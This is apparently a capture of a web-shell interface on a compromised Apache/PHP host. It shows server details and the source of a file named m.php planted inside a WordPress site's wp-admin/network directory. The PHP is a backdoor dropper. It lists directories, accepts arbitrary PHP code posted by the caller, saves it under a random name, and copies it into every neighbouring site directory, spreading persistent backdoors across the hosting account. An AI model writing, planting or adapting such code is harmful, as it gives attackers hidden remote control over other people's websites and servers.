HEX
Server: Apache
System: Linux gains.linuxbigapps.com 4.18.0-553.74.1.lve.el8.x86_64 #1 SMP Tue Sep 9 14:25:24 UTC 2025 x86_64
User: mountains (1551)
PHP: 8.0.30
Disabled: allow_url_include, show_source, symlink, system, passthru, exec, popen, pclose, proc_open, proc_terminate,proc_get_status, proc_close, proc_nice, allow_url_fopen, shell-exec, shell_exec, fpassthru, base64_encodem, escapeshellcmd, escapeshellarg, crack_check,crack_closedict, crack_getlastmessage, crack_opendict, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, dl, escap, phpinfo
$ pwd: /home/mountains/domains/mountainsofhope.org/public_html/wp-admin/network/
Upload Files
File: /home/mountains/domains/mountainsofhope.org/public_html/wp-admin/network/m.php
<?php

function generateRandomString($length) {
    $characters = 'abcdefghijklmnopqrstuvwxyz';
    $charLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charLength - 1)];
    }
    return $randomString;
}

function method1() {
    $currentPath = dirname($_SERVER['DOCUMENT_ROOT']);

    if ($currentPath === false) {
        echo "Unable to determine the current path.";
        return;
    }

    $contents = scandir($currentPath);

    if ($contents === false) {
        echo "Unable to list the contents of the current path.";
        return;
    }
    echo json_encode($contents);
}

function method2() {
    $currentPath = $_SERVER['DOCUMENT_ROOT'];

    if ($currentPath === false) {
        echo "Unable to determine the current path.";
        return;
    }

    $contents = scandir($currentPath);

    if ($contents === false) {
        echo "Unable to list the contents of the current path.";
        return;
    }
    echo json_encode($contents);
}

if (isset($_GET['met1'])) {
    method1();
} else if (isset($_GET['met2'])) {
    method2();
} else if (isset($_GET['actmet1'])) {
    $sc = $_POST['file'];
    $nama = generateRandomString(8);
    $filePath = $nama . '.php';
    
    $dead = fopen($filePath, "w");
    if ($dead === false) {
        echo "Failed to open the file for writing.";
    } else {
    
        if (fwrite($dead, $sc) === false) {
            echo "Failed to write to the file.";
        } else {
            fclose($dead);
            $currentPath = dirname($_SERVER['DOCUMENT_ROOT']);
            $contents = scandir($currentPath);
            foreach ($contents as $a) {
                $newpath = $currentPath . '/' . $a . '/' . $nama . '.php';
                $badman = @copy($filePath, $newpath);
                if ($badman) {
                    echo $a . '/' . $nama . '.php' . '|';
                }
            }
        }
    }
} else if (isset($_GET['actmet2'])) {
    $sc = $_POST['file'];
    $nama = generateRandomString(8);
    $filePath = $nama . '.php';
    
    $dead = fopen($filePath, "w");
    if ($dead === false) {
        echo "Failed to open the file for writing.";
    } else {
    
        if (fwrite($dead, $sc) === false) {
            echo "Failed to write to the file.";
        } else {
            fclose($dead);
            $currentPath = $_SERVER['DOCUMENT_ROOT'];
            $contents = scandir($currentPath);
            foreach ($contents as $a) {
                $newpath = $currentPath . '/' . $a . '/' . $nama . '.php';
                $badman = @copy($filePath, $newpath);
                if ($badman) {
                    echo $a . '/' . $nama . '.php' . '|';
                }
            }
        }
    }
} else {
    echo 'DeathShop';
}
?>
@ Telegram